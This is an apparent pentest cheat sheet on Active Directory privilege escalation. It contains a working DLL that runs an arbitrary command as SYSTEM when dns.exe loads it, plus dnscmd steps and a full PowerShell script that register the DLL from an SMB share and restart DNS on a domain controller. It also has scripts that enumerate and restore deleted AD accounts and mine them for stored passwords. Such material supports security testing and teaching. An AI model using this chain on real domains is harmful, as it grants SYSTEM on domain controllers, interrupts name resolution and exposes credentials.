AD

Interesting groups

DnsAdmins

Members of the DnsAdmins group can configure the DNS service to load an arbitrary DLL (the ServerLevelPluginDll setting). The DLL is not loaded immediately: once the DNS service is restarted, dns.exe loads it and calls its DnsPluginInitialize export. The DNS service runs as NT AUTHORITY\SYSTEM, usually on a domain controller, so whatever the DLL does at that point runs as SYSTEM on the DC.

DLL skeleton

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

// Standard DLL entry point. Nothing needs to happen here: the payload runs
// when the DNS service calls DnsPluginInitialize after loading the DLL.
BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
        case DLL_PROCESS_ATTACH:
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
            break;
    }
    return TRUE;
}

// Called once by dns.exe (running as SYSTEM) when the plugin is loaded.
// Replace ${command} with the command to run. system() blocks until the
// command returns, and the DNS service stays in the "starting" state for
// that long, so keep the command short-lived (or have it spawn a detached
// process and return).
extern "C" __declspec(dllexport)
DWORD WINAPI DnsPluginInitialize( PVOID pDnsAllocateFunction, PVOID pDnsFreeFunction){
    system("${command}");
    return ERROR_SUCCESS;
}

// Called when the plugin is unloaded; nothing to clean up here.
extern "C" __declspec(dllexport)
DWORD WINAPI DnsPluginCleanup(){
    return ERROR_SUCCESS;
}

// Called by the server for name queries. Returning ERROR_SUCCESS without
// adding any record means the plugin does not interfere with resolution.
extern "C" __declspec(dllexport)
DWORD WINAPI DnsPluginQuery(PSTR pszQueryName, DWORD wQueryType, PSTR pszRecordOwnerName, PVOID ppDnsRecordListHead){
    return ERROR_SUCCESS;
}

Steps

  1. Register the malicious DLL as the server-level plugin:

    dnscmd ${ip} /config /serverlevelplugindll ${dllLocation}

    ${ip} is the IP (or hostname) of the DNS server on which the DLL must be loaded, usually a domain controller. It can be 127.0.0.1 if the command is executed directly on the target machine.

    ${dllLocation} is the path to the malicious DLL as seen from the DNS server. It can be a UNC path on an SMB share (\\10.10.10.10\Share\malicious.dll); in that case the share must be readable by the DNS server's computer account, since dns.exe runs as SYSTEM and fetches the DLL over the network when it starts.

  2. Verify the DLL path has been written to the registry:

    Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ -Name ServerLevelPluginDll

  3. Restart the service so the DLL gets loaded (members of DnsAdmins are normally allowed to stop and start it):

    sc.exe stop dns && sc.exe start dns

    sc.exe stop returns as soon as the stop request is sent, so the start can fail because the service is still stopping; wait a moment and run the start again if that happens. Restarting the DNS service on a domain controller briefly breaks name resolution for the whole domain, and the command in the DLL runs while the service is starting. To clean up afterwards, delete the ServerLevelPluginDll registry value and restart the service once more.
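The whole procedure as one PowerShell script, added here as an example (it is not code from the original page). It assumes it is run directly on the DNS server (hence 127.0.0.1) by a member of DnsAdmins, with the RSAT ActiveDirectory module installed, and that \\10.10.10.10\Share\malicious.dll is a DLL built from the skeleton above on a share readable by the server's computer account; both values are assumptions.

```powershell
# Added example, not part of the original page. Runs on the DNS server itself
# as a DnsAdmins member; $DllPath is an assumed UNC path to the built DLL.
Import-Module ActiveDirectory

$DnsServer = '127.0.0.1'
$DllPath   = '\\10.10.10.10\Share\malicious.dll'   # assumed, must be readable by the DC computer account
$RegKey    = 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters'

# Sanity check: is the current user (directly or through nesting) in DnsAdmins?
$user    = $env:USERNAME
$members = Get-ADGroupMember -Identity 'DnsAdmins' -Recursive | Select-Object -ExpandProperty SamAccountName
if ($members -notcontains $user) {
    Write-Warning "$user is not in DnsAdmins; dnscmd will probably be refused"
}

# Step 1: register the DLL. dnscmd writes the path into the ServerLevelPluginDll value.
$out = & dnscmd.exe $DnsServer /config /serverlevelplugindll $DllPath 2>&1
if ($LASTEXITCODE -ne 0) { throw "dnscmd failed (exit $LASTEXITCODE): $out" }

# Step 2: verify the registry value holds exactly the path we set.
$value = (Get-ItemProperty -Path $RegKey -Name ServerLevelPluginDll -ErrorAction Stop).ServerLevelPluginDll
if ($value -ne $DllPath) { throw "ServerLevelPluginDll is '$value', expected '$DllPath'" }

# Step 3: restart the service. Restart-Service waits for the stop to finish,
# unlike 'sc.exe stop && sc.exe start', which can race the still-stopping service.
# DnsPluginInitialize (and therefore ${command}) runs as SYSTEM during the start;
# if that command blocks, WaitForStatus times out because the service never reaches Running.
Restart-Service -Name DNS -Force
(Get-Service -Name DNS).WaitForStatus('Running', [TimeSpan]::FromSeconds(60))

# Cleanup: remove the value and restart once more so the DLL is no longer loaded.
Remove-ItemProperty -Path $RegKey -Name ServerLevelPluginDll -ErrorAction SilentlyContinue
Restart-Service -Name DNS -Force
```

The membership check is only a hint: dnscmd is authorised by the DNS server's own ACL, so a user who is not in DnsAdmins but holds equivalent rights would still succeed. The cleanup at the end matters on an engagement, because a stale ServerLevelPluginDll value pointing at a share that no longer exists makes the DNS service fail to start at the next reboot.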
    

AD Recycle Bin

Users in this group can browse the AD Recycle Bin, which holds deleted objects (users, computers, groups) until the deleted-object lifetime expires (180 days by default). "AD Recycle Bin" is not a built-in group: it is a custom group that has been granted read access on the Deleted Objects container. When the Recycle Bin optional feature is enabled, deleted objects keep all of their attributes, so old description fields, SIDs and group memberships can still be read, and a deleted account can be restored with its original attributes and memberships by anyone who also holds the rights to reanimate it; without the feature, only stripped tombstones remain.

# Requires the ActiveDirectory module (RSAT) and read access on the Deleted Objects container
Import-Module ActiveDirectory

# List all deleted AD objects (users, computers, groups, ...)
Get-ADObject -Filter {isDeleted -eq $true} -IncludeDeletedObjects -Properties *

# List only deleted user accounts
Get-ADObject -Filter {isDeleted -eq $true -and objectClass -eq "user"} -IncludeDeletedObjects -Properties *

# Query a specific deleted user by SamAccountName
Get-ADObject -Filter {SamAccountName -eq "${samAccountName}"} -IncludeDeletedObjects -Properties *

# Query a specific deleted user if we know the SID
Get-ADObject -Filter {objectSid -eq "${SID}"} -IncludeDeletedObjects -Properties *

# Restore the deleted AD user from the Active Directory Recycle Bin
# (needs the right to reanimate tombstones and create objects in the original parent container)
Get-ADObject -Filter {UserPrincipalName -eq "${userPrincipalName}"} -IncludeDeletedObjects -Properties * | Restore-ADObject
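A small PowerShell toolkit for the same enumeration and restore, added here as an example (not code from the original page). It assumes the RSAT ActiveDirectory module and a domain account with read access on the Deleted Objects container; the account name deleted.user at the end is an assumption. It goes a step beyond the commands above by first checking whether the Recycle Bin feature is actually enabled, which decides whether the listed objects still carry their attributes, and by defaulting the restore to a dry run.

```powershell
# Added example, not part of the original page. Assumes RSAT ActiveDirectory
# and a user with read rights on the Deleted Objects container.
Import-Module ActiveDirectory

# Is the Recycle Bin optional feature enabled? If EnabledScopes is empty, deleted
# objects are plain tombstones with most attributes (and all links) stripped.
function Test-ADRecycleBinEnabled {
    $feature = Get-ADOptionalFeature -Filter 'Name -like "Recycle Bin Feature"'
    return [bool]($feature.EnabledScopes.Count -gt 0)
}

# Enumerate deleted user accounts with the attributes worth reading first.
# objectClass filtering keeps the Deleted Objects container itself out of the list.
function Get-DeletedADUser {
    Get-ADObject -Filter { isDeleted -eq $true -and objectClass -eq "user" } `
                 -IncludeDeletedObjects `
                 -Properties samAccountName, description, lastKnownParent, objectSid, memberOf, whenChanged |
        Select-Object Name, samAccountName, description, lastKnownParent, objectSid, memberOf, whenChanged
}

# Restore one deleted user by SamAccountName. Without -Force the restore is only
# simulated (-WhatIf), so the script can be run to see what would come back.
function Restore-DeletedADUser {
    param(
        [Parameter(Mandatory)][string]$SamAccountName,
        [switch]$Force
    )
    $obj = Get-ADObject -Filter { isDeleted -eq $true -and samAccountName -eq $SamAccountName } -IncludeDeletedObjects
    if (-not $obj) { throw "No deleted object with SamAccountName '$SamAccountName'" }
    if ($Force) { $obj | Restore-ADObject } else { $obj | Restore-ADObject -WhatIf }
}

if (-not (Test-ADRecycleBinEnabled)) {
    Write-Warning 'AD Recycle Bin is not enabled: deleted objects are stripped tombstones, memberOf and description will be empty'
}
Get-DeletedADUser | Format-Table -AutoSize
Restore-DeletedADUser -SamAccountName 'deleted.user'   # assumed account; add -Force to really restore
```

Read the description and memberOf columns before restoring anything: a deleted service account whose description still contains a password, or an account that was a member of a privileged group, is interesting even without being restored, and a restore is a noisy, logged directory change.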
